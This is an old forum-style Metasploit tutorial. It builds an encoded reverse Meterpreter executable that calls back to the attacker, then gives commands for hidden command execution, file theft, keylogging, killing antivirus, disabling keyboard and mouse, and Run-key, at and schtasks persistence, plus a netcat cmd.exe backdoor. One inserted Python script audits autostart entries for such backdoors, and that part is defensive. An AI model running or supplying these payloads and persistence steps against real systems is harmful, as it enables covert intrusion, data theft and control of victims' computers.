I present my tutorial on the Metasploit Framework. This applies to both Linux and Windows.
Although, I would seriously advise using Metasploit inside Linux, specifically
'Backtrack 4 - PreRelease' (The Latest)
If you don't know what the Metasploit Framework is, then look it up. You've been missing out. In no way is this meant to be a comprehensive guide. MSF is HUGE. So many things can be done with it,
you could write 15 books on it. MSF is Open Source and coded in the Ruby language.
Get used to the 'help' option!
PAYLOADs
========
I'm gonna start with Payloads. Many people know already that MSF is an exploitation framework, as in you can
work out vulnerabilities in software, and use the framework to quickly make working exploits for it.
There are hundreds of payloads that you can choose from, so that when you exploit the system in question
you can easily automate the execution of a payload of your choice on the machine.
I will show you how to turn those payloads into an actual .EXE so it will just run as is.
Ok. Let's begin:
Fire up your MSF, make sure it's updated, as they are constantly making amendments to this.
For Backtrack I think it's: cd pentest/exploits/framework3
Metasploit Double Encoded Reverse Meterpreter Payload
====================================================
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe
LHOST - is our machine (listening host), as we are waiting for a connection from RHOST (remote host)
LPORT - self-explanatory. Just make sure you have port forwarding set up on your router of course.
Meterpreter - An incredibly advanced shell which sort of simulates bash (even on a Win system) - lots of power.
You'll see how much power shortly.
Now you have your PAYLOAD.exe
Metasploit Listener
===================
In /framework3 directory
$ ./msfconsole
(Takes a little minute for this to load)
use exploit/multi/handler (Sets the exploit to a handler)
set PAYLOAD windows/meterpreter/reverse_tcp (Most common Payload to use, try experimenting with others)
set LHOST 192.162.1.50 (Make sure you set LHOST to your address on the Network and not localhost)
set LPORT 82 (Sometimes, port 80, 443 or 8080 is better as to some FW's it looks less suspicious)
set ExitOnSession false (As soon as you get a session, it doesn't automatically jump in to it)
set AutoRunScript /killav.rb (when the client connects back, and the meterpreter payload is uploaded, the killav.rb script is uploaded and executed)
exploit -j (sets the exploit up as a job, good for shells on multiple clients)
(See more on scripts... down below)
Continuation
============
When all goes well, and you have hit 'exploit -j' and have waited for a client to click on the payload.exe you created earlier,
you will see stuff happening on the screen. You will notice it run the killav script, and then say something like:
* Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)
Ok, here's the basics:
type:
sessions -l (this lists whatever sessions we have i.e. clients. Notice the lowercase L)
sessions -i 1 (this is to interact with session 1. i.e. Interact. Lowercase I)
If you need to come out of this screen, either CTRL+Z or type 'background' without the ''
Ok.. So we are in the session: Brilliant
Continuation - The Good Stuff
=============================
$ Meterpreter > getuid (this will show you the currently logged in user)
$ Meterpreter > idletime (wanna see how long the user has been afk?)
$ Meterpreter > help (this will show you a massive list of amazing commands to use!)
$ Meterpreter > use priv (then check help again, more privileged commands now eh?)
ok I will show some really handy ones
$ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the client)
$ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)
$ Meterpreter > cd "Documents and settings" (cd's to a folder with spaces in it.)
$ Meterpreter > ls (this is an example of the bash type commands we have on the target Win machine, version of dir)
$ Meterpreter > download -r "My Documents" /home/root/Documents (This would download the entire "My Docs" folder over to us.)
$ Meterpreter > execute -f evil.exe (executes the file on the client)
$ Meterpreter > execute -f cmd.exe -c -H -i (-f executes, cmd.exe shell on target, channelized, hidden, interactive)
(client will not see a thing you're doing as all the options are set properly)
Check down the bottom for some useful cmd.exe commands that are really useful
$ Meterpreter > uictl disable keyboard (disables some user interface components)
$ Meterpreter > uictl disable mouse
$ Meterpreter > uictl enable keyboard (enables)
$ Meterpreter > ps (this will show you a detailed list of all processes running on the target machine)
$ Meterpreter > migrate pid (migrates/injects itself into another process id) e.g. migrate 716 (explorer.exe)
$ Meterpreter > kill pid (kills process) e.g. kill 563 (av.exe goes down)
etc etc etc etc....
Using Payload As A Backdoor
===========================
upload /home/metabkdr.exe metabkdr.exe (to app data directory)
execute -f cmd.exe -c -H -i
Way 1 :
cmd.exe > REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f
(This adds a registry startup obviously)
Way 2 :
cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c start "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"
(runs the backdoor at 7pm all weekdays; the at command works for all Windows I think)
Way 3 :
cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /ED 11/11/2011
(This runs the backdoor every 45 mins as SYSTEM on XP. XP Home doesn't have schtasks, has 'at' though)
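As an added defender-side example, not part of the original post: a small Python audit that parses `reg query` output for the Run key and `schtasks /query /fo LIST /v` output and flags any autostart whose binary sits outside the Windows and Program Files directories, which is exactly where the 'firewall' Run value and the FIREWALL task above would stand out. The two samples are constructed, and the system-directory baseline is an assumption.

```python
import re
# Constructed sample of `reg query HKCU\...\Run` output (assumption, not from a real host).
REG_SAMPLE = """
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    ctfmon.exe    REG_SZ    C:\\WINDOWS\\system32\\ctfmon.exe
    firewall      REG_SZ    C:\\Documents and Settings\\Owner\\Application Data\\Microsoft\\Installer\\metabkdr.exe
"""
# Constructed sample of `schtasks /query /fo LIST /v` output, reduced to the fields read here.
TASK_SAMPLE = """
TaskName:      FIREWALL
Task To Run:   "C:\\Documents and Settings\\Owner\\Application Data\\Microsoft\\Installer\\metabkdr.exe"
Run As User:   SYSTEM
TaskName:      Defrag
Task To Run:   C:\\WINDOWS\\system32\\defrag.exe C:
Run As User:   SYSTEM
"""
# Where legitimate autostart binaries normally live (assumed baseline for this check).
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\")

def parse_reg_run(text):
    """Return (value_name, command) pairs from `reg query` output."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"\s+(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.+)$", line)
        if m:
            entries.append((m.group(1), m.group(2).strip()))
    return entries

def parse_schtasks(text):
    """Return (task_name, command, run_as) triples from LIST /v output."""
    tasks, cur = [], {}
    for line in text.splitlines():
        m = re.match(r"(TaskName|Task To Run|Run As User):\s*(.*)$", line)
        if m:
            cur[m.group(1)] = m.group(2).strip()
        if "TaskName" in cur and "Run As User" in cur:  # one task block is complete
            tasks.append((cur["TaskName"], cur.get("Task To Run", ""), cur["Run As User"]))
            cur = {}
    return tasks

def exe_path(command):  # cut the executable path out of a command line, quoted or bare
    command = command.strip().lstrip('"')
    end = command.lower().find(".exe")
    return command[:end + 4] if end != -1 else command.split()[0]

def audit(reg_text, task_text):  # (source, name, path) for autostarts outside SYSTEM_DIRS
    candidates = [("run_key", n, c) for n, c in parse_reg_run(reg_text)]
    candidates += [("schtask", n, c) for n, c, _ in parse_schtasks(task_text)]
    return [(src, name, exe_path(cmd)) for src, name, cmd in candidates
            if not exe_path(cmd).lower().startswith(SYSTEM_DIRS)]
```

On a live host the same two functions can be fed the real command output; entries under a user profile path, or a SYSTEM task launching from one, are the ones to investigate.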
Plant A Simple Backdoor with Netcat
===================================
plant a backdoor
A really simple way of planting a backdoor could be using netcat.
steps:
1. upload a netcat executable (nc.exe) to the remote machine.
meterpreter provides a command 'upload' for that
2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
3. now from your machine, type nc -v -n <ip address> <port>
It will give you a command shell of the remote machine
nc -l -d -p 80 -e c:\windows\system32\cmd.exe
More On Scripts:
================
Scripts can be run from the meterpreter shell when you have a shell on a client.
All you do is: (where '$' is not to be typed. This is the bash shell)
$ run scraper -h (This will show you the options etc for whatever of the scripts)
or
$ run keylogrecorder -h
The sky is your limit when it comes to scripts. You can code them to do all sorts of stuff for you.
There are many already inside the framework, made by folk.. here's a small list of some already there:
killav.rb (kills all anti viruses running on the system)
getcountermeasure.rb (kills av's and fw's/ids')
scraper.rb (logs LOADS of useful information via a series of automated commands on the client. Logs stored in /root/.msf3/)
gettelnet.rb (able to open up a telnet server on the client with a username and password)
checkvm.rb (checks to see if it is a VM. And version numbers)
netenum.rb
search_dwld.rb
winbf.rb
credcollect.rb
hostsedit.rb
remotewinenum.rb
keylogrecorder.rb
scheduleme.rb
winenum.rb
getgui.rb
schtasksabuse.rb
wmic.rb
get_local_subnets.rb
migrate.rb
Credits: backtrack forums / metasploit /irongeek